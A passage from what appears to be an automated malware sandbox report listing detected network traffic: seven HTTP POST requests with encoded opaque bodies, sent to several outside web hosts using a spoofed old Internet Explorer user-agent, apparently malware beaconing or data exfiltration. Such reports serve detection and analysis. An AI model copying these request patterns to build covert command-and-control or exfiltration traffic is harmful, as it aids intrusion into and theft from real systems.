4d 6e 58 48 4b 58 4f 42 61 4d 77 6c 31 48 5a 61 75 47 31 76 4d 38 32 4d 75 45 4f 6b 30 2b 77 78 35 76 47 6d 79 47 72 2b 6e 46 66 63 33 45 67 6b 73 44 36 4a 5a 44 6d 6a 65 4c 75 65 39 6f 71 35 64 33 42 5a 31 45 67 56 75 74 48 4b 32 52 4c 42 4f 5a 4e 63 6f 38 6c 6f 73 77 65 38 6b 77 79 44 47 46 50 2b 72 63 57 2f 6d 48 57 51 72 59 47 53 39 35 65 71 72 74 32 39 55 74 79 4b 69 61 72 37 38 79 44 50 68 35 66 72 7a 4a 73 36 69 46 76 43 59 74 72 54 63 46 71 64 4a 31 5a 52 77 4a 4a 54 74 67 31 6f 6b 74 34 73 6f 32 7a 72 71 78 35 43 51 4f 43 34 47 41 4f 56 61 45 62 32 37 61 57 30 58 73 59 74 6c 58 2b 4b 31 63 48 59 7a 42 64 6d 5a 33 61 49 6a 58 48 37 67 50 4a 43 49 74 42 54 4d 33 44 54 41 69 72 49 50 2b 51 3d 3d Data Ascii: EgyLSDGeGGmIT7ByUIF/1IoxIoNvm0eO9YfS5gxMAL16sIUkblu/vRSzkR6ye7MFNNpqWQsnEyV0WnR7jtP8Gab4u77Don3ofBl6WHAJAsC+T+dmqfF6WkSoh02u2EcfOYSAWfeG1FQt7v7Q0Wy5whktpj+AebS/Q2wv897QRsC9AC2tqhcnmMhkSrDBxQHeacU+omJXQgKKivHILKgBbg5pAStfkrER+MP2tNSaxuk6Ugwi8+buPuJf5Eh0ZZ81IJzPmrPFfZiBwWOzfYXlNFi8MA1fhLbPZjDO9zPV0Xv1+hmJl4VMz1GMnXHKXOBaMwl1HZauG1vM82MuEOk0+wx5vGmyGr+nFfc3EgksD6JZDmjeLue9oq5d3BZ1EgVutHK2RLBOZNco8loswe8kwyDGFP+rcW/mHWQrYGS95eqrt29UtyKiar78yDPh5frzJs6iFvCYtrTcFqdJ1ZRwJJTtg1okt4so2zrqx5CQOC4GAOVaEb27aW0XsYtlX+K1cHYzBdmZ3aIjXH7gPJCItBTM3DTAirIP+Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 79 2b 33 4b 6e 73 54 4b 43 6d 6c 49 42 74 69 42 33 31 66 70 71 35 64 32 4c 6e 66 38 79 75 51 75 4f 4b 79 78 6f 66 64 2b 67 44 52 50 75 5a 69 37 75 74 62 41 49 6f 71 69 50 45 4c 58 53 53 68 4b 4c 4e 37 56 58 5a 72 45 6f 32 33 30 49 62 71 75 44 75 54 7a 70 35 51 6a 47 59 54 64 31 48 6f 36 59 61 79 78 66 47 71 47 4f 69 77 7a 6e 46 74 4a 67 65 56 6f 42 2f 6a 33 71 47 2f 5a 76 32 61 47 47 47 6e 52 34 6a 4c 32 73 75 6e 34 56 41 58 54 46 43 35 51 6c 76 70 50 5a 2b 6a 54 77 42 69 73 4d 58 75 4c 4c 41 61 54 41 6e 70 39 4d 43 44 6d 50 45 6a 2f 2b 64 71 56 5a 57 66 44 4d 50 6b 4c 6d 7a 66 59 77 49 34 69 6c 52 41 47 49 69 77 4c 73 61 4d 34 35 63 77 7a 48 72 5a 63 4e 53 41 75 2f 54 33 75 4c 6f 63 58 49 75 50 44 49 5a 4a 45 73 45 38 50 6d 31 4c 73 71 4a 66 4c 6f 33 33 41 73 36 31 36 42 4b 48 43 65 32 62 65 6c 50 53 49 6e 66 31 71 65 4c 37 69 45 76 52 39 6e 39 6f 62 44 70 54 66 6e 6b 39 4f 73 6c 78 6d 30 55 52 53 6b 53 55 42 57 38 34 70 6d 36 31 42 50 57 79 44 77 33 4c 2b 43 6c 4f 2b 53 32 70 73 6b 44 70 79 2f 6b 74 47 57 43 49 78 67 65 5a 71 69 65 69 4f 78 63 49 77 49 75 37 39 4d 57 41 59 4b 4a 32 4f 47 6e 36 32 50 30 51 7a 65 45 36 70 66 77 42 72 4d 7a 35 35 69 4d 34 51 66 35 75 76 62 50 31 69 33 50 66 34 44 2f 4e 4a 7a 6e 59 74 39 6e 71 4c 57 47 6b 64 52 55 32 39 65 37 76 72 51 65 46 4b 58 37 47 5a 68 70 6e 7a 36 48 51 33 50 47 42 45 67 46 4d 45 52 4c 78 5a 39 43 44 4f 66 46 77 33 2f 66 55 6b 45 33 6e 78 4d 73 4f 64 6c 78 42 52 6d 55 4c 57 69 4a 64 4c 76 52 6f 4e 73 56 4d 51 78 71 78 62 4a 41 72 76 6f 49 51 53 56 34 71 36 47 47 74 41 65 53 61 4d 4e 49 6f 41 63 45 4e 66 63 59 4a 65 69 50 33 36 47 39 64 45 6a 4b 56 6b 56 2f 2f 68 Data Ascii: y+3KnsTKCmlIBtiB31fpq5d2Lnf8yuQuOKyxofd+gDRPuZi7utbAIoqiPELXSShKLN7VXZrEo230IbquDuTzp5QjGYTd1Ho6YayxfGqGOiwznFtJgeVoB/j3qG/Zv2aGGGnR4jL2sun4VAXTFC5QlvpPZ+jTwBisMXuLLAaTAnp9MCDmPEj/+dqVZWfDMPkLmzfYwI4ilRAGIiwLsaM45cwzHrZcNSAu/T3uLocXIuPDIZJEsE8Pm1LsqJfLo33As616BKHCe2belPSInf1qeL7iEvR9n9obDpTfnk9Oslxm0URSkSUBW84pm61BPWyDw3L+ClO+S2pskDpy/ktGWCIxgeZqieiOxcIwIu79MWAYKJ2OGn62P0QzeE6pfwBrMz55iM4Qf5uvbP1i3Pf4D/NJznYt9nqLWGkdRU29e7vrQeFKX7GZhpnz6HQ3PGBEgFMERLxZ9CDOfFw3/fUkE3nxMsOdlxBRmULWiJdLvRoNsVMQxqxbJArvoIQSV4q6GGtAeSaMNIoAcENfcYJeiP36G9dEjKVkV//h
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 65 78 67 64 42 49 6d 31 48 6d 6d 30 50 4e 78 31 32 4d 47 7a 69 61 49 2b 79 37 71 6e 6b 64 53 65 7a 57 44 74 69 59 6d 76 49 55 37 6a 46 51 69 6c 59 79 67 72 57 33 4c 67 30 77 49 73 55 74 7a 4c 69 76 49 4f 4a 6c 48 66 66 7a 4d 56 51 33 63 46 78 78 6a 48 48 39 62 5a 6b 36 75 42 38 4f 6c 67 65 6b 4a 72 36 65 54 4c 34 69 4d 42 35 47 72 30 4f 31 51 56 6c 45 4a 71 6d 59 74 53 75 55 69 42 41 79 5a 67 79 73 37 46 30 7a 34 6f 64 47 55 7a 54 63 68 73 2b 6a 4b 65 52 4f 30 65 74 4d 5a 48 69 51 6e 61 72 6d 72 6f 43 73 75 51 53 79 4e 6d 56 57 76 42 6f 69 4d 6c 32 69 4b 2f 34 64 52 56 6a 6e 4c 49 72 65 64 79 71 5a 72 70 70 30 46 6a 38 38 30 4c 76 4d 4f 78 34 2b 39 37 30 73 63 4c 76 67 41 32 4c 44 30 52 30 53 6f 6a 33 48 46 44 73 43 56 4f 6b 63 41 50 78 65 73 56 4e 6f 4a 4b 49 59 50 52 41 5a 53 77 38 50 38 59 43 6f 48 54 48 46 39 42 37 43 72 77 47 38 50 47 77 64 58 52 32 62 42 4a 51 61 50 47 30 7a 42 53 73 44 75 53 4c 57 52 6c 56 30 48 6c 54 74 38 4c 42 44 49 61 6f 46 36 36 4b 46 6c 69 70 66 72 51 69 66 7a 32 4f 51 63 59 36 48 51 6d 74 6f 6f 77 42 6b 33 39 50 6d 55 4e 2f 48 4f 56 4f 65 2f 56 4a 49 50 57 4f 2b 4d 61 41 59 6a 6f 62 78 7a 47 7a 30 70 30 70 6d 74 38 32 6e 50 63 6b 41 45 39 73 56 6b 4e 6b 64 69 55 42 35 59 55 5a 6d 79 56 59 6b 75 33 72 54 47 44 70 79 59 44 30 6b 45 31 64 38 38 79 71 48 45 36 47 70 48 37 4d 6e 47 6c 62 43 36 6e 55 6a 42 6e 4d 6f 61 43 45 44 50 6d 57 31 72 57 43 79 2b 48 30 6b 76 36 68 6b 50 71 68 4b 73 6c 72 4c 4e 4e 43 54 6d 44 67 6e 51 6a 64 76 61 75 56 35 79 70 52 70 46 44 69 4b 62 4e 6b 32 6b 43 78 58 77 63 30 74 37 4c 72 56 57 64 45 67 57 33 49 43 64 4e 4e 6a 77 42 64 4c 67 37 6e 49 73 61 35 77 76 49 6a 64 6d 38 38 67 79 45 4b 52 78 4d 35 51 6d 49 6b 44 5a 68 66 6a 33 63 71 66 58 6a 7a 57 44 49 57 77 3d 3d Data Ascii: exgdBIm1Hmm0PNx12MGziaI+y7qnkdSezWDtiYmvIU7jFQilYygrW3Lg0wIsUtzLivIOJlHffzMVQ3cFxxjHH9bZk6uB8OlgekJr6eTL4iMB5Gr0O1QVlEJqmYtSuUiBAyZgys7F0z4odGUzTchs+jKeRO0etMZHiQnarmroCsuQSyNmVWvBoiMl2iK/4dRVjnLIredyqZrpp0Fj880LvMOx4+970scLvgA2LD0R0Soj3HFDsCVOkcAPxesVNoJKIYPRAZSw8P8YCoHTHF9B7CrwG8PGwdXR2bBJQaPG0zBSsDuSLWRlV0HlTt8LBDIaoF66KFlipfrQifz2OQcY6HQmtoowBk39PmUN/HOVOe/VJIPWO+MaAYjobxzGz0p0pmt82nPckAE9sVkNkdiUB5YUZmyVYku3rTGDpyYD0kE1d88yqHE6GpH7MnGlbC6nUjBnMoaCEDPmW1rWCy+H0kv6hkPqhKslrLNNCTmDgnQjdvauV5ypRpFDiKbNk2kCxXwc0t7LrVWdEgW3ICdNNjwBdLg7nIsa5wvIjdm88gyEKRxM5QmIkDZhfj3cqfXjzWDIWw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 45 67 79 4c 53 44 47 65 47 47 6d 49 54 37 42 79 55 49 46 2f 31 49 6f 78 49 6f 4e 76 6d 30 65 4f 39 59 66 53 35 67 78 4d 41 4c 31 36 73 49 55 6b 62 6c 75 2f 76 52 53 7a 6b 52 36 79 65 37 4d 46 4e 4e 70 71 57 51 73 6e 45 79 56 30 57 6e 52 37 6a 74 50 38 47 61 62 34 75 37 37 44 6f 6e 33 6f 66 42 6c 36 57 48 41 4a 41 73 43 2b 54 2b 64 6d 71 66 46 36 57 6b 53 6f 68 30 32 75 32 45 63 66 4f 59 53 41 57 66 65 47 31 46 51 74 37 76 37 51 30 57 79 35 77 68 6b 74 70 6a 2b 41 65 62 53 2f 51 32 77 76 38 39 37 51 52 73 43 39 41 43 32 74 71 68 63 6e 6d 4d 68 6b 53 72 44 42 78 51 48 65 61 63 55 2b 6f 6d 4a 58 51 67 4b 4b 69 76 48 49 4c 4b 67 42 62 67 35 70 41 53 74 66 6b 72 45 52 2b 4d 50 32 74 4e 53 61 78 75 6b 36 55 67 77 69 38 2b 62 75 50 75 4a 66 35 45 68 30 5a 5a 38 31 49 4a 7a 50 6d 72 50 46 66 5a 69 42 77 57 4f 7a 66 59 58 6c 4e 46 69 38 4d 41 31 66 68 4c 62 50 5a 6a 44 4f 39 7a 50 56 30 58 76 31 2b 68 6d 4a 6c 34 56 4d 7a 31 47 4d 6e 58 48 4b 58 4f 42 61 4d 77 6c 31 48 5a 61 75 47 31 76 4d 38 32 4d 75 45 4f 6b 30 2b 77 78 35 76 47 6d 79 47 72 2b 6e 46 66 63 33 45 67 6b 73 44 36 4a 5a 44 6d 6a 65 4c 75 65 39 6f 71 35 64 33 42 5a 31 45 67 56 75 74 48 4b 32 52 4c 42 4f 5a 4e 63 6f 38 6c 6f 73 77 65 38 6b 77 79 44 47 46 50 2b 72 63 57 2f 6d 48 57 51 72 59 47 53 39 35 65 71 72 74 32 39 55 74 79 4b 69 61 72 37 38 79 44 50 68 35 66 72 7a 4a 73 36 69 46 76 43 59 74 72 54 63 46 71 64 4a 31 5a 52 77 4a 4a 54 74 67 31 6f 6b 74 34 73 6f 32 7a 72 71 78 35 43 51 4f 43 34 47 41 4f 56 61 45 62 32 37 61 57 30 58 73 59 74 6c 58 2b 4b 31 63 48 59 7a 42 64 6d 5a 33 61 49 6a 58 48 37 67 50 4a 43 49 74 42 54 4d 33 44 54 41 69 72 49 50 2b 51 3d 3d Data Ascii: EgyLSDGeGGmIT7ByUIF/1IoxIoNvm0eO9YfS5gxMAL16sIUkblu/vRSzkR6ye7MFNNpqWQsnEyV0WnR7jtP8Gab4u77Don3ofBl6WHAJAsC+T+dmqfF6WkSoh02u2EcfOYSAWfeG1FQt7v7Q0Wy5whktpj+AebS/Q2wv897QRsC9AC2tqhcnmMhkSrDBxQHeacU+omJXQgKKivHILKgBbg5pAStfkrER+MP2tNSaxuk6Ugwi8+buPuJf5Eh0ZZ81IJzPmrPFfZiBwWOzfYXlNFi8MA1fhLbPZjDO9zPV0Xv1+hmJl4VMz1GMnXHKXOBaMwl1HZauG1vM82MuEOk0+wx5vGmyGr+nFfc3EgksD6JZDmjeLue9oq5d3BZ1EgVutHK2RLBOZNco8loswe8kwyDGFP+rcW/mHWQrYGS95eqrt29UtyKiar78yDPh5frzJs6iFvCYtrTcFqdJ1ZRwJJTtg1okt4so2zrqx5CQOC4GAOVaEb27aW0XsYtlX+K1cHYzBdmZ3aIjXH7gPJCItBTM3DTAirIP+Q==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 4a 6f 56 71 70 33 55 53 43 32 6b 31 42 6e 37 67 33 49 48 47 79 47 35 6d 32 53 59 44 4c 31 53 69 65 66 34 7a 2f 6a 50 6e 35 45 30 4b 2b 64 52 55 51 61 50 30 76 6d 41 68 51 6b 69 74 37 2b 2b 6a 2f 4b 50 66 69 74 56 55 2b 61 35 55 43 35 6a 4b 49 2b 5a 56 4b 42 7a 4c 4d 2f 67 35 4b 33 39 6f 4b 36 65 6b 38 4c 4b 39 42 5a 69 53 4c 4e 43 58 35 7a 79 73 4d 2f 68 4b 6f 66 58 6f 71 2f 4e 61 39 30 4f 6d 68 53 4e 74 64 7a 68 38 72 31 54 71 57 52 6a 72 6f 6f 46 73 6e 4b 56 62 32 51 6d 56 75 63 45 66 67 64 78 6b 31 37 4d 69 7a 61 50 4f 72 4d 6a 6d 6f 71 37 36 35 43 33 64 78 52 79 51 63 6c 65 54 45 2b 77 59 4e 51 52 68 64 61 61 5a 30 6a 62 4c 62 41 67 43 33 4d 62 30 39 2b 52 6d 73 4d 46 59 49 37 56 46 64 64 57 35 38 63 61 66 68 7a 79 4d 43 51 42 77 52 2f 66 49 6b 63 66 59 76 5a 73 6e 35 74 73 45 30 62 7a 77 65 52 59 55 4b 77 2f 4c 33 6e 49 54 4d 35 37 46 38 35 62 7a 52 4f 62 66 69 69 35 2b 6f 61 4e 6c 6d 45 70 35 4f 52 52 47 42 4b 79 72 35 6d 55 62 59 46 4e 66 69 54 61 6e 5a 45 68 52 4a 2b 42 34 61 79 73 72 7a 33 4c 51 76 31 74 41 42 35 72 56 4a 32 70 58 35 39 43 6d 73 74 36 78 79 75 68 30 42 37 65 38 6a 49 66 65 36 2b 50 76 45 2b 42 6e 48 77 65 34 56 2b 31 64 69 5a 56 74 34 4e 62 36 4c 6a 78 69 38 78 43 57 62 30 54 4a 71 68 50 72 61 55 34 69 45 53 63 49 6b 42 56 75 52 78 2b 71 6a 34 65 48 6a 2f 55 63 6c 33 2b 57 62 54 69 6e 56 53 2b 31 55 41 4f 70 5a 70 4b 70 6d 63 41 33 56 34 47 48 67 51 76 31 6c 52 4b 48 49 72 6d 52 57 71 42 78 35 48 6b 74 34 63 4c 74 75 65 67 36 64 78 4d 4b 59 44 78 66 4f 57 43 6e 61 4f 58 68 78 4b 74 50 79 4e 66 6e 47 55 4a 53 41 4b 4e 73 48 65 63 63 69 35 63 69 31 42 63 64 42 56 6b 6f 6a 63 61 47 47 77 42 73 4e 75 6e 30 4d 66 4b 50 73 67 68 6d 6f 4b 46 45 4b 49 31 66 54 61 32 2b 69 69 6b 2f 44 6a 51 3d Data Ascii: JoVqp3USC2k1Bn7g3IHGyG5m2SYDL1Sief4z/jPn5E0K+dRUQaP0vmAhQkit7++j/KPfitVU+a5UC5jKI+ZVKBzLM/g5K39oK6ek8LK9BZiSLNCX5zysM/hKofXoq/Na90OmhSNtdzh8r1TqWRjrooFsnKVb2QmVucEfgdxk17MizaPOrMjmoq765C3dxRyQcleTE+wYNQRhdaaZ0jbLbAgC3Mb09+RmsMFYI7VFddW58cafhzyMCQBwR/fIkcfYvZsn5tsE0bzweRYUKw/L3nITM57F85bzRObfii5+oaNlmEp5ORRGBKyr5mUbYFNfiTanZEhRJ+B4aysrz3LQv1tAB5rVJ2pX59Cmst6xyuh0B7e8jIfe6+PvE+BnHwe4V+1diZVt4Nb6Ljxi8xCWb0TJqhPraU4iEScIkBVuRx+qj4eHj/Ucl3+WbTinVS+1UAOpZpKpmcA3V4GHgQv1lRKHIrmRWqBx5Hkt4cLtueg6dxMKYDxfOWCnaOXhxKtPyNfnGUJSAKNsHecci5ci1BcdBVkojcaGGwBsNun0MfKPsghmoKFEKI1fTa2+iik/DjQ=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.edimart.huCache-Control: no-cacheData Raw: 4e 4f 47 52 73 5a 5a 58 4a 47 6e 73 53 67 65 55 63 53 6e 54 6d 7a 6e 68 6c 32 49 32 70 53 58 7a 4b 75 31 39 72 33 61 4d 4e 49 46 35 51 39 79 33 53 4e 6f 77 43 51 39 33 5a 59 43 53 52 69 69 64 77 2f 75 48 43 48 46 71 43 6d 79 33 65 67 37 73 4d 53 2f 53 39 32 42 61 56 44 66 6d 6e 50 2f 4a 47 30 35 6b 31 53 6b 4b 4c 64 56 66 53 36 65 2b 4a 6c 4d 6f 6a 72 77 72 59 46 35 76 68 4b 6b 42 59 55 6d 41 56 73 2b 46 4d 65 37 73 65 34 79 78 35 70 48 34 73 6b 38 53 44 62 64 2b 65 62 55 76 4c 65 41 6b 45 39 6f 61 5a 56 74 44 58 55 6c 76 37 74 41 4e 38 51 46 31 59 61 77 4b 6b 6b 70 54 2f 62 4f 74 63 37 6f 6f 33 4a 70 63 35 65 36 75 6a 65 6e 43 43 4b 61 7a 4f 37 75 49 61 75 61 75 6e 41 6a 71 61 56 78 31 42 43 39 41 2b 34 79 6c 5a 50 6c 64 65 30 44 53 4b 4c 52 6f 4c 4c 59 55 6d 47 4e 67 35 4e 72 64 2f 63 54 6a 74 49 76 50 2f 49 68 61 48 6d 4c 79 72 52 54 68 58 43 34 61 31 6c 42 37 53 2b 53 4d 6b 44 38 67 64 4a 51 30 4f 76 7a 70 30 64 6f 77 6f 35 6c 53 33 57 6d 48 4a 56 7a 4b 50 7a 36 2b 61 63 37 77 63 4e 58 48 50 58 61 5a 36 5a 75 31 4c 49 35 73 7a 56 6d 6d 6b 68 67 32 34 55 2f 56 34 48 52 44 43 6a 46 36 55 47 2f 71 39 49 6f 6e 64 43 66 73 53 41 38 58 2b 44 64 45 57 35 4b 47 7a 6e 72 76 53 51 52 65 73 75 46 4e 2f 55 49 77 55 33 30 36 35 75 57 67 30 6c 54 37 41 6f 63 33 45 61 50 4f 56 78 77 50 75 68 43 70 4e 6f 42 4e 51 50 4f 45 49 35 6a 42 79 65 54 42 2f 51 64 2f 42 73 38 70 72 49 54 46 78 77 75 45 56 75 76 4d 46 65 4e 79 50 4c 55 34 35 76 4e 59 2b 41 32 5a 54 6f 30 70 58 6c 52 4b 54 48 73 76 6d 45 65 43 59 54 2f 75 53 48 38 56 4c 33 52 4f 75 38 58 48 41 64 50 6f 64 34 72 57 71 53 64 50 53 38 6e 6b 74 34 61 41 65 56 67 37 50 65 2b 65 64 55 54 56 6d 50 43 54 6b 2f 55 62 4d 34 63 64 32 6e 2b 42 4b 35 47 4f 4a 47 74 67 56 51 3d 3d Data Ascii: NOGRsZZXJGnsSgeUcSnTmznhl2I2pSXzKu19r3aMNIF5Q9y3SNowCQ93ZYCSRiidw/uHCHFqCmy3eg7sMS/S92BaVDfmnP/JG05k1SkKLdVfS6e+JlMojrwrYF5vhKkBYUmAVs+FMe7se4yx5pH4sk8SDbd+ebUvLeAkE9oaZVtDXUlv7tAN8QF1YawKkkpT/bOtc7oo3Jpc5e6ujenCCKazO7uIauaunAjqaVx1BC9A+4ylZPlde0DSKLRoLLYUmGNg5Nrd/cTjtIvP/IhaHmLyrRThXC4a1lB7S+SMkD8gdJQ0Ovzp0dowo5lS3WmHJVzKPz6+ac7wcNXHPXaZ6Zu1LI5szVmmkhg24U/V4HRDCjF6UG/q9IondCfsSA8X+DdEW5KGznrvSQResuFN/UIwU3065uWg0lT7Aoc3EaPOVxwPuhCpNoBNQPOEI5jByeTB/Qd/Bs8prITFxwuEVuvMFeNyPLU45vNY+A2ZTo0pXlRKTHsvmEeCYT/uSH8VL3ROu8XHAdPod4rWqSdPS8nkt4aAeVg7Pe+edUTVmPCTk/UbM4cd2n+BK5GOJGtgVQ==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 4f 76 44 38 49 65 69 74 48 32 6b 68 41 48 7a 72 71 7a 6a 39 4c 56 74 56 65 66 4c 77 56 6a 42 74 6e 49 39 2f 4a 71 77 34 75 52 75 6e 34 63 76 6b 6f 52 35 6e 45 76 52 4f 31 45 6b 59 45 73 79 68 30 68 6f 33 45 49 6d 70 73 35 72 49 30 6e 39 58 2b 51 6e 79 2b 74 56 43 46 44 66 76 6e 78 5a 30 77 63 51 38 62 6b 4b 44 4e 43 71 61 36 44 36 4b 4a 70 50 4a 73 7a 41 33 73 6b 2b 76 50 6b 48 65 41 70 5a 64 64 6d 57 62 68 58 66 4a 39 41 32 6f 4a 43 44 59 2f 2b 6a 63 6c 75 4c 47 6d 72 6b 69 34 4b 58 36 7a 33 59 37 6e 49 39 44 79 79 73 79 4b 64 76 69 52 42 4a 54 31 4d 56 35 63 73 4c 51 76 76 67 71 59 6b 56 2b 67 37 2b 48 6c 66 63 38 59 4b 58 33 74 67 6c 31 53 6d 31 57 5a 36 4c 45 52 76 38 74 53 42 72 68 74 30 39 55 5a 67 38 51 77 4a 74 48 47 74 39 71 49 2b 63 58 59 34 50 58 6a 2b 43 74 57 46 73 58 41 64 37 66 78 73 63 48 53 2f 2b 52 4e 75 43 58 52 54 52 77 65 4e 55 42 73 75 32 7a 45 53 5a 67 68 47 34 42 42 53 33 2b 45 67 54 6c 37 63 70 61 76 51 78 6b 6d 35 35 6c 74 39 47 70 59 44 49 32 62 31 54 53 48 42 57 38 4a 4a 39 34 76 5a 6a 62 48 57 79 48 59 78 74 5a 4d 68 6a 63 55 34 72 53 56 2b 5a 42 38 65 49 51 62 64 66 5a 4b 70 78 54 5a 4c 39 4e 4b 45 71 67 6c 49 46 62 6f 50 49 55 41 66 39 37 43 6d 46 42 39 4f 54 6d 43 2b 6e 35 4b 42 37 37 6f 64 51 4d 6d 56 2f 62 6f 7a 59 73 50 54 64 54 30 4c 39 67 74 54 58 54 78 56 69 71 67 6f 47 66 6b 49 30 51 71 72 61 56 76 4a 4f 63 51 4a 35 6a 66 4a 2f 6c 64 6c 74 66 75 74 51 4c 61 54 71 74 5a 31 47 4d 31 65 31 4c 6a 53 6a 51 39 69 4b 75 39 72 39 48 45 37 65 37 52 4d 4d 47 77 48 55 7a 6b 59 45 79 73 73 48 7a 2b 64 78 6b 4c 37 51 6d 34 38 53 4a 49 31 36 72 4e 69 6d 6f 31 52 79 42 69 55 64 4f 56 78 57 46 63 67 4a 54 Data Ascii: OvD8IeitH2khAHzrqzj9LVtVefLwVjBtnI9/Jqw4uRun4cvkoR5nEvRO1EkYEsyh0ho3EImps5rI0n9X+Qny+tVCFDfvnxZ0wcQ8bkKDNCqa6D6KJpPJszA3sk+vPkHeApZddmWbhXfJ9A2oJCDY/+jcluLGmrki4KX6z3Y7nI9DyysyKdviRBJT1MV5csLQvvgqYkV+g7+Hlfc8YKX3tgl1Sm1WZ6LERv8tSBrht09UZg8QwJtHGt9qI+cXY4PXj+CtWFsXAd7fxscHS/+RNuCXRTRweNUBsu2zESZghG4BBS3+EgTl7cpavQxkm55lt9GpYDI2b1TSHBW8JJ94vZjbHWyHYxtZMhjcU4rSV+ZB8eIQbdfZKpxTZL9NKEqglIFboPIUAf97CmFB9OTmC+n5KB77odQMmV/bozYsPTdT0L9gtTXTxViqgoGfkI0QqraVvJOcQJ5jfJ/ldltfutQLaTqtZ1GM1e1LjSjQ9iKu9r9HE7e7RMMGwHUzkYEyssHz+dxkL7Qm48SJI16rNimo1RyBiUdOVxWFcgJT
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.waldi.plCache-Control: no-cacheData Raw: 6a 47 72 6d 58 39 67 41 4b 6d 6b 33 39 33 38 79 32 77 37 2f 5a 4d 74 56 6d 47 4f 67 6a 4e 2b 51 6a 42 47 65 49 41 6a 59 33 48 36 46 72 78 78 2f 4d 39 38 2b 2f 4f 31 57 58 4a 67 4d 63 6b 6e 4f 55 50 71 77 39 62 39 45 51 6c 56 71 73 54 4c 35 33 76 72 2b 45 74 46 5a 39 58 52 66 50 65 6b 66 6c 36 45 63 7a 33 4a 72 42 48 74 6a 57 65 63 66 78 35 55 58 48 68 4f 42 4e 55 63 6d 53 4e 57 6a 73 49 30 50 2b 6d 48 43 43 39 42 46 67 49 78 35 64 30 50 7a 62 32 75 4e 69 2f 6f 4b 54 53 57 42 77 43 6e 6b 72 45 43 36 71 44 74 64 68 6b 64 31 52 53 79 2f 4a 35 79 47 51 51 68 73 41 4f 6b 2f 44 73 4c 51 75 63 4e 4a 43 2f 48 43 64 78 47 31 5a 6e 6b 66 69 44 4f 59 6c 31 51 35 48 51 53 41 5a 43 77 36 38 65 42 55 59 65 6d 2f 57 78 62 42 43 4a 4a 48 4b 47 43 32 64 31 41 54 61 41 47 70 6a 63 6b 79 49 73 67 35 4c 4b 30 45 54 50 47 31 73 6e 7a 79 53 48 71 38 79 57 69 6d 4e 67 2f 58 42 57 6a 55 52 5a 76 4f 53 71 50 50 75 57 44 56 4f 50 47 50 69 72 6a 4a 2f 67 32 4e 48 38 6f 73 64 49 46 57 4b 39 62 4d 6d 47 76 33 38 55 6b 42 65 4f 61 79 46 72 70 73 47 30 4f 42 34 48 61 63 62 48 65 4c 37 33 4f 2b 56 55 48 44 53 34 4d 2f 64 5a 62 41 78 30 4a 72 4d 49 42 47 66 79 35 33 6d 4d 34 55 71 73 71 6c 6e 38 39 31 67 31 62 37 70 2b 46 6c 31 4a 66 47 67 52 39 4d 68 57 53 6a 64 32 4a 66 31 2b 79 4d 43 46 5a 6d 6d 57 66 2f 6d 4b 6f 4e 75 78 57 63 37 2b 42 6a 47 6c 64 30 65 6c 4d 62 30 6a 48 6f 4f 4b 57 48 37 57 61 46 76 44 36 37 4c 48 54 41 74 2b 56 62 32 48 4a 30 6a 6a 5a 62 49 31 43 4b 36 72 6e 54 46 42 67 77 31 62 4a 6a 49 38 4e 62 38 79 7a 6e 79 5a 4c 78 6e 45 30 74 52 54 4f 6f 68 38 32 32 67 72 6a 2f 61 53 64 54 75 56 53 58 41 4f 6e 57 2f 47 65 59 66 67 45 38 33 63 48 63 34 39 39 73 53 36 4c 63 65 79 4c 51 31 44 53 70 51 67 3d 3d Data Ascii: jGrmX9gAKmk3938y2w7/ZMtVmGOgjN+QjBGeIAjY3H6Frxx/M98+/O1WXJgMcknOUPqw9b9EQlVqsTL53vr+EtFZ9XRfPekfl6Ecz3JrBHtjWecfx5UXHhOBNUcmSNWjsI0P+mHCC9BFgIx5d0Pzb2uNi/oKTSWBwCnkrEC6qDtdhkd1RSy/J5yGQQhsAOk/DsLQucNJC/HCdxG1ZnkfiDOYl1Q5HQSAZCw68eBUYem/WxbBCJJHKGC2d1ATaAGpjckyIsg5LK0ETPG1snzySHq8yWimNg/XBWjURZvOSqPPuWDVOPGPirjJ/g2NH8osdIFWK9bMmGv38UkBeOayFrpsG0OB4HacbHeL73O+VUHDS4M/dZbAx0JrMIBGfy53mM4Uqsqln891g1b7p+Fl1JfGgR9MhWSjd2Jf1+yMCFZmmWf/mKoNuxWc7+BjGld0elMb0jHoOKWH7WaFvD67LHTAt+Vb2HJ0jjZbI1CK6rnTFBgw1bJjI8Nb8yznyZLxnE0tRTOoh822grj/aSdTuVSXAOnW/GeYfgE83cHc499sS6LceyLQ1DSpQg==
